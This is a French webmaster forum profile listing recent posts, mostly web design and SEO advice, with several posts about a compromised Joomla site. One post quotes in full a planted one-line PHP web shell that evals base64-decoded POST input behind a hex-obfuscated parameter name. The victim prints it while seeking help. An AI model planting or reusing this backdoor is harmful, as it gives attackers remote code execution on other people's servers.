Jump to content

Bidule21

Hubmaster
  • Content Count

    126
  • Joined

  • Last visited

Community Reputation

0 Neutre

About Bidule21

  • Birthday 07/08/1979

Contact Methods

  • Website URL
    http://www.cequejendis.fr

Profile Information

  • Genre
    Homme
  • Localisation
    Dijon

Recent Profile Visitors

5234 profile views
  1. Bonjour, Pour l'instant, tu ne donnes pas assez d'informations sur ton site comme te l'a signalé hotgeart. Il est juste impossible de te répondre. On ne sait même pas de quoi il traite... Cela influe aussi le choix du type de pub... Si tu fais des tests de produits par exemple, l'affiliation peut paraître logique. Si c'est plus global, pourquoi pas t'orienter vers du cpc, en adaptant les types de pubs affichées par rapport à ton contenu, pour le cpm, honnêtement si tu vises 500 visiteurs par mois, ça ne sert à rien, tu t'es renseigné sur la signification du terme ? De plus, et je ne pe
  2. Il me semblait bien avoir lu quelque chose sur ce concept il y a peu, voilà un point de départ qui pourrait t'intéresser : http://korben.info/syncnet.html
  3. Merci pour ton retour, pour ma part comme je le disais plus haut, le fait de supprimer le fichier qui n'avait rien à faire là, et changer mon mot de passe ftp ont résolu le souci, comment ce fichier avait atterri là, aucune idée, mais au moins cela fonctionne-t-il maintenant correctement
  4. Bonjour, Un merci à tout le monde, les sites sont de retour, j'espère pour un moment... Finalement, ce n'était pas un composant en cause apparemment, puisque j'ai retrouvé un fichier qui n'était pas censé être là dans un de mes dossiers. Son contenu était le suivant <?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));} ?> et d'après ce que l'ami google raconte, c'est maaaaal (moi je n'y comprends rien...) Le problème est surtout que je ne comprends pas comment il a été possible d'uploader ce fichier sur mon ftp, mon mot de passe chopé en clair lors d'un transfe
  5. Oui oui effectivement, c'est sûrement la faute d'une extension (composant module plugin qu'importe...). En fouillant dans les logs je crois avoir trouvé l'IP coupable, provenance des emirats arabes unis, qui tape systématiquement en POST sur une page qui n'existe pas mais sur un composant qui après recherche semble déjà avoir subit des attaques... Je vais déjà tenter une mise à jour de tout ce qu'il y a, dès que mon hébergeur m'aura répondu histoire de voir si il veut bien au moins me débloquer l'accès. Au pire tant pis, je virerai tout et repartirai sur du propre...
  6. Bonsoir, En l’occurrence je viens de vérifier il s'agit de la version 5.2.1 qui est fournie avec Joomla. En tous cas, de ce que je vois sur les version 2.5.9 et 2.5.11. Ce qui me fait penser d'ailleurs qu'un moyen d'éviter ce problème serait peut-être de passer la configuration de Joomla pour l'envoi en smtp plutôt qu'avec phpmail ou sendmail, qu'en pensez-vous ?
  7. AH bah tant pis Je ne trouve que du phpmailer de toute façon, et ils l'utilisent tous... Aussi bien Joomla même, que certaines extensions... J'ai repéré certaines extensions pas à jour, j'ai demandé à mon hébergeur pour qu'ils redonnent accès à mes interfaces d'admin uniquement à mon IP pour faire ces mises à jour et voir ensuite si cela a résolu le problème, si cela ne pouvait être que cela, ce serait nickel ! Sinon, bah ce sera refonte totale des sites, heureusement que j'ai tous les textes de côtés, par contre ça va swinger de la redirection
  8. Merci pour ta réponse Dan ! Ils ont donc raison, en même temps je ne remettais pas trop leur parole en doute au vu de mes connaissances ... Le problème c'est que j'utilisais surtout ces sites là pour des tests, et donc ils sont bourrés d'extensions, plugins et autres modules... Donc pour retrouver lequel fait quoi, ce n'est pas gagné... Je pensais à tout remettre à plat, je crois que le moment va être venu, juste un poil plus rapidement que prévu... Et ça m'apprendra à tester des trucs en prod plutôt qu'en local, ça m'éviterait de surcharger ce qui est en ligne... MyPHPmailer et PHPmailer c'
  9. Bonjour à tous, J'ai reçu le bel email ci-dessous de mon hébergeur, les quelques sites situés sur cet hébergeur sont sur du joomla à jour, d'après eux le problème viendrait d'une faille sur un des scripts utilisés. Cela vous semble-t-il plausible au vu de l'email qu'ils m'ont fait suivre, ou bien cela peut-il venir directement d'un problème au niveau de l'hébergement ? Auriez-vous des pistes à me donner pour trouver l'origine du problème et où pourrait se trouver la faille s'il y en a bien une, j'ai jeté un oeil au ftp, à priori je n'ai pas vu de script rajouté, mais ça peut évidemment êt
  10. Bonjour, Testé sous Chrome, IE, Firefox, le tout sous Windows 7 je n'ai pas de lenteurs non plus.
  11. Je dirais qu'il a fait comme il fallait pour avoir le rendu actuel. Après il est normal d'adapter le code en fonction du résultat que l'on cherche à obtenir. Ce qu'il a fait ne prévoyait pas la bande noire donc il n'a pas eu besoin de jouer plus que ça avec les divs. Ce qu'il a fait est propre. Ensuite, chacun a ses habitudes, intégrer les CSS ou non, tout faire à la main ou utiliser des softs comme Dreamweaver, utiliser des CMS ou pas, etc... Si ce qu'il a rendu correspondait au cahier des charges, pour moi il a fait son taff, si ensuite les demandes évoluent, ce qu'il a fait ne corresp
  12. Après avoir regardé plus en détail ton code, c'est la manière dont s'imbriquent tes div qu'il faut revoir, si tu ne veux pas te prendre la tête penche toi plutôt sur la solution que tu évoquais avec un fond et une bande noire centrée. Ensuite, je te conseille un petit outil fort pratique, Firebug, qui est une extension, notamment pour firefox qui te permet de regarder dans le détail la manière dont sont faits les sites qui t'inspirent, tu pourras voir par exemple le type d'imbrication mis en place sur le site dont tu nous as donné le lien pour voir comment il a été fait.
  13. Captain_torche, A priori, il nous dit que le site a été migré donc il est encore sous la même forme pour le moment, et s'il s'agit d'une refonte, on peut imaginer que le nom de domaine n'a pas changé. Si c'est le cas, est-ce que faire des redirections permanentes via un .htaccess des anciennes pages vers les nouvelles ne permettrait pas simplement aux nouvelles pages de garder le jus des anciennes ? En partant du principe que le contenu est en relation d'une page à l'autre et pas juste dire, hop toutes les anciennes redirigent vers la nouvelle page d'accueil, que l'ancienne page contact r
  14. Salut, tu pourrais nous faire des captures d'écran, parce que je ne comprends pas bien ton histoire de bloc entrecoupés avec le background. Après, ta solution de background avec une bande noire, pourquoi pas, mais ça ne va pas t'aider à apprendre, et en plus tu as intérêt à bien penser la chose pour que ton background ne se déplace pas en fonction de taille de la fenêtre de ton visiteur . Pour la taille de ta page, revois juste le poids de tes images, rien que la première fait 1,2 Mo !!!
  15. Bonjour, Si tu rajoutes background-color : #000000; à ta classe .contener, ça donne ce que tu veux ?
×
×
  • Create New...